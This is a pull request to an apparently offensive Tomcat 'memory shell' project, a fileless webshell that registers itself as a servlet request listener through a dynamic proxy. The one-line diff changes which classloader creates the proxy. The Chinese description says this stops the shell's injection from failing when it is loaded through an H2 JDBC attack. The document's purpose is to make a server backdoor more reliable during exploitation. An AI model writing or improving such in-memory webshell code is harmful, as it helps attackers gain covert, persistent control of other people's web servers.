### PR TITLE
Modify the Classloader used to generate the dynamic proxy to prevent the class from being found.

### DIFF
--- a/TomcatMemoryShell/src/AesBase64TomcatListenerShell.java
+++ b/TomcatMemoryShell/src/AesBase64TomcatListenerShell.java
@@ -36,7 +36,7 @@ public class AesBase64TomcatListenerShell extends ClassLoader implements Invocat
                 }
             }
             if (servletRequestListenerClass != null) {
-                addListener(java.lang.reflect.Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[]{servletRequestListenerClass}, this));
+                addListener(java.lang.reflect.Proxy.newProxyInstance(servletRequestListenerClass.getClassLoader(), new Class[]{servletRequestListenerClass}, this));
             }
         } catch (Throwable e) {
 


### PR DESCRIPTION
在过H2 JDBC加载内存马的过程中，存在该模块代码生成动态代理失败的情况。原因是Thread.currentThread().getContextClassLoader()无法找到servletRequestListenerClass对应的类文件。将动态代理的第一个参数修改为该类的classloader可以避免此问题。